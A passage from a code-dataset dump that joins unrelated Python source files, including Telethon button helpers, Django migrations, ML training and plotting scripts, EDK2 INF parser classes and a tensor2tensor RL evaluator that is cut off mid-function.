data = text.encode('utf-8')
elif not isinstance(data, (bytes, bytearray, memoryview)):
data = str(data).encode('utf-8')
if len(data) > 64:
raise ValueError('Too many bytes for the data')
return types.KeyboardButtonCallback(text, data)
@staticmethod
def switch_inline(text, query='', same_peer=False):
"""
Creates a new inline button to switch to inline query.
If `query` is given, it will be the default text to be used
when making the inline query.
If ``same_peer is True`` the inline query will directly be
set under the currently opened chat. Otherwise, the user will
have to select a different dialog to make the query.
When the user clicks this button, after a chat is selected, their
input field will be filled with the username of your bot followed
by the query text, ready to make inline queries.
"""
return types.KeyboardButtonSwitchInline(text, query, same_peer)
@staticmethod
def url(text, url=None):
"""
Creates a new inline button to open the desired URL on click.
If no `url` is given, the `text` will be used as said URL instead.
You cannot detect that the user clicked this button directly.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to open the displayed URL unless
the domain is trusted, and once confirmed the URL will open in their
device.
"""
return types.KeyboardButtonUrl(text, url or text)
@staticmethod
def auth(text, url=None, *, bot=None, write_access=False, fwd_text=None):
"""
Creates a new inline button to authorize the user at the given URL.
You should set the `url` to be on the same domain as the one configured
for the desired `bot` via `@BotFather <https://t.me/BotFather>`_ using
the ``/setdomain`` command.
For more information about letting the user login via Telegram to
a certain domain, see https://core.telegram.org/widgets/login.
If no `url` is specified, it will default to `text`.
Args:
bot (`hints.EntityLike`):
The bot that requires this authorization. By default, this
is the bot that is currently logged in (itself), although
you may pass a different input peer.
.. note::
For now, you cannot use ID or username for this argument.
If you want to use a different bot than the one currently
logged in, you must manually use `client.get_input_entity()
<telethon.client.users.UserMethods.get_input_entity>`.
write_access (`bool`):
Whether write access is required or not.
This is `False` by default (read-only access).
fwd_text (`str`):
The new text to show in the button if the message is
forwarded. By default, the button text will be the same.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to login to the specified domain.
"""
return types.InputKeyboardButtonUrlAuth(
text=text,
url=url or text,
bot=utils.get_input_user(bot or types.InputUserSelf()),
request_write_access=write_access,
fwd_text=fwd_text
)
@classmethod
def text(cls, text, *, resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button with the given text.
Args:
resize (`bool`):
If present, the entire keyboard will be reconfigured to
be resized and be smaller if there are not many buttons.
single_use (`bool`):
If present, the entire keyboard will be reconfigured to
be usable only once before it hides itself.
selective (`bool`):
If present, the entire keyboard will be reconfigured to
be "selective". The keyboard will be shown only to specific
users. It will target users that are @mentioned in the text
of the message or to the sender of the message you reply to.
When the user clicks this button, a text message with the same text
as the button will be sent, and can be handled with `events.NewMessage
<telethon.events.newmessage.NewMessage>`. You cannot distinguish
between a button press and the user typing and sending exactly the
same text on their own.
"""
return cls(types.KeyboardButton(text),
resize=resize, single_use=single_use, selective=selective)
@classmethod
def request_location(cls, text, *,
resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button to request the user's location on click.
``resize``, ``single_use`` and ``selective`` are documented in `text`.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to share their location with the
bot, and if confirmed a message with geo media will be sent.
"""
return cls(types.KeyboardButtonRequestGeoLocation(text),
resize=resize, single_use=single_use, selective=selective)
@classmethod
def request_phone(cls, text, *,
resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button to request the user's phone on click.
``resize``, ``single_use`` and ``selective`` are documented in `text`.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to share their phone with the
bot, and if confirmed a message with contact media will be sent.
"""
return cls(types.KeyboardButtonRequestPhone(text),
resize=resize, single_use=single_use, selective=selective)
@classmethod
def request_poll(cls, text, *, force_quiz=False,
resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button to request the user to create a poll.
If `force_quiz` is `False`, the user will be allowed to choose whether
they want their poll to be a quiz or not. Otherwise, the user will be
forced to create a quiz when creating the poll.
If a poll is a quiz, there will be only one answer that is valid, and
the votes cannot be retracted. Otherwise, users can vote and retract
the vote, and the pol might be multiple choice.
``resize``, ``single_use`` and ``selective`` are documented in `text`.
When the user clicks this button, a screen letting the user create a
poll will be shown, and if they do create one, the poll will be sent.
"""
return cls(types.KeyboardButtonRequestPoll(text, quiz=force_quiz),
resize=resize, single_use=single_use, selective=selective)
@staticmethod
def clear():
"""
Clears all keyboard buttons after sending a message with this markup.
When used, no other button should be present or it will be ignored.
"""
return types.ReplyKeyboardHide()
@staticmethod
def force_reply():
"""
Forces a reply to the message with this markup. If used,
no other button should be present or it will be ignored.
"""
return types.ReplyKeyboardForceReply()
| 3.328125 | 3 |
src/main/resources/pys/join.py | addUsername/javaBoring | 0 | 3335 | # -*- coding: utf-8 -*-
"""
Created on Tue Jul 7 20:14:22 2020
Simple script to join json files
@author: SERGI
"""
import json
import sys
import os
def readJson(path):
with open(path, "r") as file:
return json.load(file)
def writeJson(path, dicc):
with open(path, "w") as file:
json.dump(dicc, file)
if __name__ == "__main__":
print("hello from python", flush=True)
jsonPath = str(sys.argv[1])
# =============================================================================
# jsonPath = "../eclipse-workspace/prueba/target/json/"
# =============================================================================
jsonPathTemp = jsonPath+"temp/"
arr = os.listdir(jsonPathTemp)
arr.sort()
print(arr)
dict_to_json = {}
dict_0 = readJson(jsonPathTemp + arr[0])
dict_1 = readJson(jsonPathTemp + arr[1])
dict_2 = readJson(jsonPathTemp + arr[2])
dict_3 = readJson(jsonPathTemp + arr[3])
keys = [name for name in dict_0.keys() if "0" not in name]
for key in keys:
dict_to_json[key] = dict_0[key] + dict_1[key] + dict_2[key] + dict_3[key]
#0seg,f_step,f_stop
seg = dict_0['0seg,f_step,f_stop'][0]
step = dict_0['0seg,f_step,f_stop'][1]
stop = dict_3['0seg,f_step,f_stop'][2]
dict_to_json['0seg,f_step,f_stop'] = [seg, step, stop]
print("Escribiendo json: ", jsonPath+arr[0], flush=True)
writeJson(jsonPath+arr[0], dict_to_json)
print("finish", flush=True) | 3.203125 | 3 |
app/grandchallenge/challenges/migrations/0023_auto_20200123_1102.py | njmhendrix/grand-challenge.org | 1 | 3336 | # Generated by Django 3.0.2 on 2020-01-23 11:02
import re
import django.contrib.postgres.fields.citext
import django.core.validators
from django.db import migrations
import grandchallenge.challenges.models
class Migration(migrations.Migration):
dependencies = [
("challenges", "0022_auto_20200121_1639"),
]
operations = [
migrations.AlterField(
model_name="challenge",
name="short_name",
field=django.contrib.postgres.fields.citext.CICharField(
help_text="short name used in url, specific css, files etc. No spaces allowed",
max_length=50,
unique=True,
validators=[
grandchallenge.challenges.models.validate_nounderscores,
django.core.validators.RegexValidator(
re.compile("^[-a-zA-Z0-9_]+\\Z"),
"Enter a valid “slug” consisting of letters, numbers, underscores or hyphens.",
"invalid",
),
grandchallenge.challenges.models.validate_short_name,
],
),
),
migrations.AlterField(
model_name="externalchallenge",
name="short_name",
field=django.contrib.postgres.fields.citext.CICharField(
help_text="short name used in url, specific css, files etc. No spaces allowed",
max_length=50,
unique=True,
validators=[
grandchallenge.challenges.models.validate_nounderscores,
django.core.validators.RegexValidator(
re.compile("^[-a-zA-Z0-9_]+\\Z"),
"Enter a valid “slug” consisting of letters, numbers, underscores or hyphens.",
"invalid",
),
grandchallenge.challenges.models.validate_short_name,
],
),
),
]
| 2 | 2 |
autosk_dev_test/component/LinReg.py | hmendozap/master-arbeit-files | 2 | 3337 | <reponame>hmendozap/master-arbeit-files
import numpy as np
import scipy.sparse as sp
from HPOlibConfigSpace.configuration_space import ConfigurationSpace
from HPOlibConfigSpace.conditions import EqualsCondition, InCondition
from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, \
UniformIntegerHyperparameter, CategoricalHyperparameter, Constant
from autosklearn.pipeline.components.base import AutoSklearnRegressionAlgorithm
from autosklearn.pipeline.constants import *
class LinReg(AutoSklearnRegressionAlgorithm):
def __init__(self, number_updates, batch_size, dropout_output,
learning_rate, solver, lambda2,
momentum=0.99, beta1=0.9, beta2=0.9, rho=0.95,
lr_policy='fixed', gamma=0.01, power=1.0, epoch_step=2,
random_state=None):
self.number_updates = number_updates
self.batch_size = batch_size
self.dropout_output = dropout_output
self.learning_rate = learning_rate
self.lr_policy = lr_policy
self.lambda2 = lambda2
self.momentum = momentum
self.beta1 = 1-beta1 if beta1 is not None else 0.9
self.beta2 = 1-beta2 if beta2 is not None else 0.99
self.rho = rho
self.solver = solver
self.gamma = gamma
self.power = power
self.epoch_step = epoch_step
# Empty features and shape
self.n_features = None
self.input_shape = None
self.m_issparse = False
self.m_isregression = True
self.m_isbinary = False
self.m_ismultilabel = False
self.estimator = None
def _prefit(self, X, y):
self.batch_size = int(self.batch_size)
self.n_features = X.shape[1]
self.input_shape = (self.batch_size, self.n_features)
self.num_output_units = 1 # Regression
# Normalize the output
self.mean_y = np.mean(y)
self.std_y = np.std(y)
y = (y - self.mean_y) / self.std_y
if len(y.shape) == 1:
y = y[:, np.newaxis]
self.m_issparse = sp.issparse(X)
return X, y
def fit(self, X, y):
Xf, yf = self._prefit(X, y)
epoch = (self.number_updates * self.batch_size)//X.shape[0]
number_epochs = min(max(2, epoch), 110) # Cap the max number of possible epochs
from implementation import LogisticRegression
self.estimator = LogisticRegression.LogisticRegression(batch_size=self.batch_size,
input_shape=self.input_shape,
num_output_units=self.num_output_units,
dropout_output=self.dropout_output,
learning_rate=self.learning_rate,
lr_policy=self.lr_policy,
lambda2=self.lambda2,
momentum=self.momentum,
beta1=self.beta1,
beta2=self.beta2,
rho=self.rho,
solver=self.solver,
num_epochs=number_epochs,
gamma=self.gamma,
power=self.power,
epoch_step=self.epoch_step,
is_sparse=self.m_issparse,
is_binary=self.m_isbinary,
is_multilabel=self.m_ismultilabel,
is_regression=self.m_isregression)
self.estimator.fit(Xf, yf)
return self
def predict(self, X):
if self.estimator is None:
raise NotImplementedError
preds = self.estimator.predict(X, self.m_issparse)
return preds * self.std_y + self.mean_y
def predict_proba(self, X):
if self.estimator is None:
raise NotImplementedError()
return self.estimator.predict_proba(X, self.m_issparse)
@staticmethod
def get_properties(dataset_properties=None):
return {'shortname': 'lin_reg',
'name': 'Linear Regression',
'handles_regression': True,
'handles_classification': False,
'handles_multiclass': False,
'handles_multilabel': False,
'is_deterministic': True,
'input': (DENSE, SPARSE, UNSIGNED_DATA),
'output': (PREDICTIONS,)}
@staticmethod
def get_hyperparameter_search_space(dataset_properties=None):
policy_choices = ['fixed', 'inv', 'exp', 'step']
batch_size = UniformIntegerHyperparameter("batch_size",
100, 3000,
log=True,
default=150)
number_updates = UniformIntegerHyperparameter("number_updates",
500, 10500,
log=True,
default=500)
dropout_output = UniformFloatHyperparameter("dropout_output", 0.0, 0.99,
default=0.5)
lr = UniformFloatHyperparameter("learning_rate", 1e-6, 0.1,
log=True,
default=0.01)
l2 = UniformFloatHyperparameter("lambda2", 1e-6, 1e-2,
log=True,
default=1e-3)
solver = CategoricalHyperparameter(name="solver",
choices=["sgd", "adam"],
default="sgd")
beta1 = UniformFloatHyperparameter("beta1", 1e-4, 0.1,
log=True,
default=0.1)
beta2 = UniformFloatHyperparameter("beta2", 1e-4, 0.1,
log=True,
default=0.01)
lr_policy = CategoricalHyperparameter(name="lr_policy",
choices=policy_choices,
default='fixed')
gamma = UniformFloatHyperparameter(name="gamma",
lower=1e-3, upper=1e-1,
default=1e-2)
power = UniformFloatHyperparameter("power",
0.0, 1.0,
default=0.5)
epoch_step = UniformIntegerHyperparameter("epoch_step",
2, 20,
default=5)
cs = ConfigurationSpace()
cs.add_hyperparameter(number_updates)
cs.add_hyperparameter(batch_size)
cs.add_hyperparameter(dropout_output)
cs.add_hyperparameter(lr)
cs.add_hyperparameter(l2)
cs.add_hyperparameter(solver)
cs.add_hyperparameter(beta1)
cs.add_hyperparameter(beta2)
cs.add_hyperparameter(lr_policy)
cs.add_hyperparameter(gamma)
cs.add_hyperparameter(power)
cs.add_hyperparameter(epoch_step)
beta1_depends_on_solver = EqualsCondition(beta1, solver, "adam")
beta2_depends_on_solver = EqualsCondition(beta2, solver, "adam")
gamma_depends_on_policy = InCondition(child=gamma, parent=lr_policy,
values=['inv', 'exp', 'step'])
power_depends_on_policy = EqualsCondition(power, lr_policy, 'inv')
epoch_step_depends_on_policy = EqualsCondition(epoch_step,
lr_policy, 'step')
cs.add_condition(beta1_depends_on_solver)
cs.add_condition(beta2_depends_on_solver)
cs.add_condition(gamma_depends_on_policy)
cs.add_condition(power_depends_on_policy)
cs.add_condition(epoch_step_depends_on_policy)
return cs
| 1.757813 | 2 |
python_work/Chapter5/exe3_alien_color.py | Elektra-2/python_crash_course_2nd | 1 | 3338 | <filename>python_work/Chapter5/exe3_alien_color.py
# Creating a elif chain
alien_color = 'red'
if alien_color == 'green':
print('Congratulations! You won 5 points!')
elif alien_color == 'yellow':
print('Congratulations! You won 10 points!')
elif alien_color == 'red':
print('Congratulations! You won 15 points!')
| 3.984375 | 4 |
DigiPsych_API/Data_Science_API/evaluate_model.py | larryzhang95/Voice-Analysis-Pipeline | 7 | 3339 | import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.model_selection import learning_curve
# Plot learning curve
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
plt.figure()
plt.title(title)
if ylim is not None:
plt.ylim(*ylim)
plt.xlabel("Training examples")
plt.ylabel("Score")
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.grid(True)
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="g")
plt.plot(train_sizes, train_scores_mean, 'o-', color="r",
label="Training score")
plt.plot(train_sizes, test_scores_mean, 'o-', color="g",
label="Validation score")
plt.legend(loc="best")
plt.show()
return plt
# Plot validation curve
def plot_validation_curve(estimator, title, X, y, param_name, param_range, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
train_scores, test_scores = validation_curve(estimator, X, y, param_name, param_range, cv)
train_mean = np.mean(train_scores, axis=1)
train_std = np.std(train_scores, axis=1)
test_mean = np.mean(test_scores, axis=1)
test_std = np.std(test_scores, axis=1)
plt.plot(param_range, train_mean, color='r', marker='o', markersize=5, label='Training score')
plt.fill_between(param_range, train_mean + train_std, train_mean - train_std, alpha=0.15, color='r')
plt.plot(param_range, test_mean, color='g', linestyle='--', marker='s', markersize=5, label='Validation score')
plt.fill_between(param_range, test_mean + test_std, test_mean - test_std, alpha=0.15, color='g')
plt.grid(True)
plt.xscale('log')
plt.legend(loc='best')
plt.xlabel('Parameter')
plt.ylabel('Score')
plt.ylim(ylim)
| 3.5 | 4 |
oomi/__init__.py | sremes/oomi | 0 | 3340 | """Utilities for downloading comsumption data from Oomi."""
from oomi.oomi_downloader import OomiDownloader, OomiConfig
| 1.25 | 1 |
BaseTools/Source/Python/UPT/Object/Parser/InfMisc.py | KaoTuz/edk2-stable202108 | 9 | 3341 | ## @file
# This file is used to define class objects of INF file miscellaneous.
# Include BootMode/HOB/Event and others. It will consumed by InfParser.
#
# Copyright (c) 2011 - 2018, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
'''
InfMisc
'''
import Logger.Log as Logger
from Logger import ToolError
from Library import DataType as DT
from Object.Parser.InfCommonObject import InfSectionCommonDef
from Library.Misc import Sdict
##
# BootModeObject
#
class InfBootModeObject():
def __init__(self):
self.SupportedBootModes = ''
self.HelpString = ''
self.Usage = ''
def SetSupportedBootModes(self, SupportedBootModes):
self.SupportedBootModes = SupportedBootModes
def GetSupportedBootModes(self):
return self.SupportedBootModes
def SetHelpString(self, HelpString):
self.HelpString = HelpString
def GetHelpString(self):
return self.HelpString
def SetUsage(self, Usage):
self.Usage = Usage
def GetUsage(self):
return self.Usage
##
# EventObject
#
class InfEventObject():
def __init__(self):
self.EventType = ''
self.HelpString = ''
self.Usage = ''
def SetEventType(self, EventType):
self.EventType = EventType
def GetEventType(self):
return self.EventType
def SetHelpString(self, HelpString):
self.HelpString = HelpString
def GetHelpString(self):
return self.HelpString
def SetUsage(self, Usage):
self.Usage = Usage
def GetUsage(self):
return self.Usage
##
# HobObject
#
class InfHobObject():
def __init__(self):
self.HobType = ''
self.Usage = ''
self.SupArchList = []
self.HelpString = ''
def SetHobType(self, HobType):
self.HobType = HobType
def GetHobType(self):
return self.HobType
def SetUsage(self, Usage):
self.Usage = Usage
def GetUsage(self):
return self.Usage
def SetSupArchList(self, ArchList):
self.SupArchList = ArchList
def GetSupArchList(self):
return self.SupArchList
def SetHelpString(self, HelpString):
self.HelpString = HelpString
def GetHelpString(self):
return self.HelpString
##
# InfSpecialCommentObject
#
class InfSpecialCommentObject(InfSectionCommonDef):
def __init__(self):
self.SpecialComments = Sdict()
InfSectionCommonDef.__init__(self)
def SetSpecialComments(self, SepcialSectionList = None, Type = ''):
if Type == DT.TYPE_HOB_SECTION or \
Type == DT.TYPE_EVENT_SECTION or \
Type == DT.TYPE_BOOTMODE_SECTION:
for Item in SepcialSectionList:
if Type in self.SpecialComments:
ObjList = self.SpecialComments[Type]
ObjList.append(Item)
self.SpecialComments[Type] = ObjList
else:
ObjList = []
ObjList.append(Item)
self.SpecialComments[Type] = ObjList
return True
def GetSpecialComments(self):
return self.SpecialComments
## ErrorInInf
#
# An encapsulate of Error for INF parser.
#
def ErrorInInf(Message=None, ErrorCode=None, LineInfo=None, RaiseError=True):
if ErrorCode is None:
ErrorCode = ToolError.FORMAT_INVALID
if LineInfo is None:
LineInfo = ['', -1, '']
Logger.Error("InfParser",
ErrorCode,
Message=Message,
File=LineInfo[0],
Line=LineInfo[1],
ExtraData=LineInfo[2],
RaiseError=RaiseError)
| 2.15625 | 2 |
21-08/Starters8/1.py | allenalvin333/Codechef_Competitions | 0 | 3342 | # https://www.codechef.com/START8C/problems/PENALTY
for T in range(int(input())):
n=list(map(int,input().split()))
a=b=0
for i in range(len(n)):
if(n[i]==1):
if(i%2==0): a+=1
else: b+=1
if(a>b): print(1)
elif(b>a): print(2)
else: print(0) | 2.75 | 3 |
util/eval.py | jhong93/vpd | 7 | 3343 | <filename>util/eval.py
import matplotlib.pyplot as plt
from sklearn.metrics import ConfusionMatrixDisplay, confusion_matrix
def save_confusion_matrix(truth, pred, out_file, norm=None):
label_names = list(set(truth) | set(pred))
label_names.sort()
truth_compact = [label_names.index(x) for x in truth]
pred_compact = [label_names.index(x) for x in pred]
cm = confusion_matrix(
truth_compact, pred_compact, labels=list(range(len(label_names))),
normalize=norm)
if norm is not None:
cm *= 100
fig = plt.figure(figsize=(20, 20))
ax = fig.add_subplot(111)
disp = ConfusionMatrixDisplay(
confusion_matrix=cm, display_labels=label_names)
disp.plot(ax=ax, xticks_rotation='vertical',
values_format='.1f' if norm is not None else 'd')
plt.tight_layout()
plt.savefig(out_file)
plt.close(fig)
| 2.75 | 3 |
python/py3study/pytorch-lab/demo-cifar.py | sillyemperor/langstudy | 0 | 3344 | import torch
import torchvision
import torchvision.transforms as transforms
import os.path
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
transform = transforms.Compose(
[transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
root = os.path.join(BASE_DIR, '../data/')
trainset = torchvision.datasets.CIFAR10(root=root, train=True,
download=True, transform=transform)
trainloader = torch.utils.data.DataLoader(trainset,
shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(root=root, train=False,
download=True, transform=transform)
testloader = torch.utils.data.DataLoader(testset,
shuffle=False, num_workers=2)
import torch.nn as nn
import torch.nn.functional as F
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
# print(x.shape)
x = self.pool(F.relu(self.conv1(x)))
# print(x.shape)
x = self.pool(F.relu(self.conv2(x)))
# print(x.shape)
x = x.view(-1, 16 * 5 * 5)
# print(x.shape)
x = F.relu(self.fc1(x))
# print(x.shape)
x = F.relu(self.fc2(x))
# print(x.shape)
x = self.fc3(x)
# print(x.shape)
return x
# torch.Size([1, 3, 32, 32])
# torch.Size([1, 6, 14, 14])
# torch.Size([1, 16, 5, 5])
# torch.Size([1, 400])
# torch.Size([1, 120])
# torch.Size([1, 84])
# torch.Size([1, 100])
model = Net()
import torch.optim as optim
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=0.0002, momentum=0.9)
from util import train_eval
train_eval(model, criterion, trainloader, testloader, optimizer, epochs=5)
# [1, 5000] loss: 2.293
# [1, 10000] loss: 2.075
# [1, 15000] loss: 1.876
# [1, 20000] loss: 1.754
# [1, 25000] loss: 1.658
# [1, 30000] loss: 1.625
# [1, 35000] loss: 1.558
# [1, 40000] loss: 1.520
# [1, 45000] loss: 1.494
# [1, 50000] loss: 1.459
# 1/5 4456/10000 44.56% (107.18255376815796s)
# [2, 5000] loss: 1.413
# [2, 10000] loss: 1.398
# [2, 15000] loss: 1.386
# [2, 20000] loss: 1.379
# [2, 25000] loss: 1.358
# [2, 30000] loss: 1.324
# [2, 35000] loss: 1.333
# [2, 40000] loss: 1.280
# [2, 45000] loss: 1.296
# [2, 50000] loss: 1.304
# 2/5 5357/10000 53.56999999999999% (105.8866639137268s)
# [3, 5000] loss: 1.226
# [3, 10000] loss: 1.231
# [3, 15000] loss: 1.215
# [3, 20000] loss: 1.235
# [3, 25000] loss: 1.199
# [3, 30000] loss: 1.187
# [3, 35000] loss: 1.192
# [3, 40000] loss: 1.194
# [3, 45000] loss: 1.196
# [3, 50000] loss: 1.191
# 3/5 5729/10000 57.29% (105.63971090316772s)
# [4, 5000] loss: 1.117
# [4, 10000] loss: 1.096
# [4, 15000] loss: 1.121
# [4, 20000] loss: 1.123
# [4, 25000] loss: 1.107
# [4, 30000] loss: 1.120
# [4, 35000] loss: 1.124
# [4, 40000] loss: 1.094
# [4, 45000] loss: 1.105
# [4, 50000] loss: 1.102
# 4/5 5829/10000 58.29% (112.56915497779846s)
# [5, 5000] loss: 1.034
# [5, 10000] loss: 1.024
# [5, 15000] loss: 1.040
# [5, 20000] loss: 1.027
# [5, 25000] loss: 1.043
# [5, 30000] loss: 1.049
# [5, 35000] loss: 1.024
# [5, 40000] loss: 1.042
# [5, 45000] loss: 1.027
# [5, 50000] loss: 1.027
# 5/5 6178/10000 61.78% (109.75669193267822s)
# 61.0% (541.0347754955292s)
| 2.875 | 3 |
astroquery/neodys/tests/test_neodys_remote.py | B612-Asteroid-Institute/astroquery | 0 | 3345 |
from ... import neodys
def test_neodys_query():
test_object = "2018VP1"
res_kep_0 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="ke", epoch_near_present=0)
res_kep_1 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="ke", epoch_near_present=1)
res_eq_0 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="eq", epoch_near_present=0)
res_eq_1 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="eq", epoch_near_present=1)
assert len(res_kep_0['Keplerian State Vector']) == 6
assert len(res_kep_0['Covariance Matrix']) == 21
assert res_kep_0['Mean Julian Date'][0] != res_kep_1['Mean Julian Date'][0]
assert len(res_eq_0['Equinoctial State Vector']) == 6
assert len(res_eq_0['Covariance Matrix']) == 21
assert len(res_eq_0['Keplerian Correlation Matrix']) == 0
assert res_eq_0['Mean Julian Date'][0] != res_eq_1['Mean Julian Date'][0]
| 2.203125 | 2 |
corehq/apps/accounting/migrations/0026_auto_20180508_1956.py | kkrampa/commcare-hq | 1 | 3346 | <gh_stars>1-10
# -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-05-08 19:56
from __future__ import unicode_literals
from __future__ import absolute_import
from django.db import migrations
def noop(*args, **kwargs):
pass
def _convert_emailed_to_array_field(apps, schema_editor):
BillingRecord = apps.get_model('accounting', 'BillingRecord')
for record in BillingRecord.objects.all():
if record.emailed_to != '':
record.emailed_to_list = record.emailed_to.split(',')
record.save()
WireBillingRecord = apps.get_model('accounting', 'WireBillingRecord')
for wirerecord in WireBillingRecord.objects.all():
if wirerecord.emailed_to != '':
wirerecord.emailed_to_list = wirerecord.emailed_to.split(',')
wirerecord.save()
class Migration(migrations.Migration):
dependencies = [
('accounting', '0025_auto_20180508_1952'),
]
operations = [
migrations.RunPython(_convert_emailed_to_array_field, reverse_code=noop)
]
| 1.851563 | 2 |
tensor2tensor/rl/evaluator.py | SouBanerjee/tensor2tensor | 1 | 3347 | # coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Evaluation script for RL agents.
Example invocation:
python -m tensor2tensor.rl.evaluator \
--policy_dir=$HOME/t2t/rl_v1/policy \
--eval_metrics_dir=$HOME/t2t/rl_v1/full_eval_metrics \
--hparams_set=rlmb_base \
--hparams='batch_size=64'
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import os
from tensor2tensor.data_generators import gym_env
from tensor2tensor.layers import common_video
from tensor2tensor.models.research import rl # pylint: disable=unused-import
from tensor2tensor.rl import rl_utils
from tensor2tensor.rl import trainer_model_based_params # pylint: disable=unused-import
from tensor2tensor.utils import flags as t2t_flags # pylint: disable=unused-import
from tensor2tensor.utils import registry
from tensor2tensor.utils import trainer_lib
import tensorflow as tf
flags = tf.flags
FLAGS = flags.FLAGS
flags.DEFINE_string("output_dir", "", "Main directory for multi-runs.")
flags.DEFINE_integer("total_num_workers", 1, "How many workers in total.")
flags.DEFINE_string("worker_to_game_map", "", "How to map workers to games.")
flags.DEFINE_string("policy_dir", "", "Directory with policy checkpoints.")
flags.DEFINE_string("model_dir", "", "Directory with model checkpoints.")
flags.DEFINE_string(
"eval_metrics_dir", "", "Directory to output the eval metrics at."
)
flags.DEFINE_bool("full_eval", True, "Whether to ignore the timestep limit.")
flags.DEFINE_enum(
"agent", "policy", ["random", "policy", "planner"], "Agent type to use."
)
flags.DEFINE_bool(
"eval_with_learner", True,
"Whether to use the PolicyLearner.evaluate function instead of an "
"out-of-graph one. Works only with --agent=policy."
)
flags.DEFINE_string(
"planner_hparams_set", "planner_small", "Planner hparam set."
)
flags.DEFINE_string("planner_hparams", "", "Planner hparam overrides.")
flags.DEFINE_integer(
"log_every_steps", 20, "Log every how many environment steps."
)
flags.DEFINE_string(
"debug_video_path", "", "Path to save the planner debug video at."
)
# Unused flags needed to pass for multi-run infrastructure.
flags.DEFINE_bool("autotune", False, "Unused here.")
flags.DEFINE_string("objective", "", "Unused here.")
flags.DEFINE_string("client_handle", "client_0", "Unused.")
flags.DEFINE_bool("maximize_tuner_objective", True, "Unused.")
flags.DEFINE_integer("vizier_search_algorithm", 0, "Unused.")
@registry.register_hparams
def planner_tiny():
return tf.contrib.training.HParams(
num_rollouts=1,
planning_horizon=2,
rollout_agent_type="random",
batch_size=1,
env_type="simulated",
)
@registry.register_hparams
def planner_small():
return tf.contrib.training.HParams(
num_rollouts=64,
planning_horizon=16,
rollout_agent_type="policy",
batch_size=64,
env_type="simulated",
)
def make_env(env_type, real_env, sim_env_kwargs):
"""Factory function for envs."""
return {
"real": lambda: real_env.new_like( # pylint: disable=g-long-lambda
batch_size=sim_env_kwargs["batch_size"],
store_rollouts=False,
),
"simulated": lambda: rl_utils.SimulatedBatchGymEnvWithFixedInitialFrames( # pylint: disable=g-long-lambda
**sim_env_kwargs
),
}[env_type]()
def make_agent(
agent_type, env, policy_hparams, policy_dir, sampling_temp,
sim_env_kwargs=None, frame_stack_size=None, planning_horizon=None,
rollout_agent_type=None, batch_size=None, num_rollouts=None,
inner_batch_size=None, video_writer=None, env_type=None):
"""Factory function for Agents."""
if batch_size is None:
batch_size = env.batch_size
return {
"random": lambda: rl_utils.RandomAgent( # pylint: disable=g-long-lambda
batch_size, env.observation_space, env.action_space
),
"policy": lambda: rl_utils.PolicyAgent( # pylint: disable=g-long-lambda
batch_size, env.observation_space, env.action_space,
policy_hparams, policy_dir, sampling_temp
),
"planner": lambda: rl_utils.PlannerAgent( # pylint: disable=g-long-lambda
batch_size, make_agent(
rollout_agent_type, env, policy_hparams, policy_dir,
sampling_temp, batch_size=inner_batch_size
), make_env(env_type, env.env, sim_env_kwargs),
lambda env: rl_utils.BatchStackWrapper(env, frame_stack_size),
num_rollouts, planning_horizon,
discount_factor=policy_hparams.gae_gamma, video_writer=video_writer
),
}[agent_type]()
def make_eval_fn_with_agent(
agent_type, planner_hparams, model_dir, log_every_steps=None,
video_writer=None
):
"""Returns an out-of-graph eval_fn using the Agent API."""
def eval_fn(env, loop_hparams, policy_hparams, policy_dir, sampling_temp):
"""Eval function."""
base_env = env
env = rl_utils.BatchStackWrapper(env, loop_hparams.frame_stack_size)
sim_env_kwargs = rl.make_simulated_env_kwargs(
base_env, loop_hparams, batch_size=planner_hparams.batch_size,
model_dir=model_dir
)
agent = make_agent(
agent_type, env, policy_hparams, policy_dir, sampling_temp,
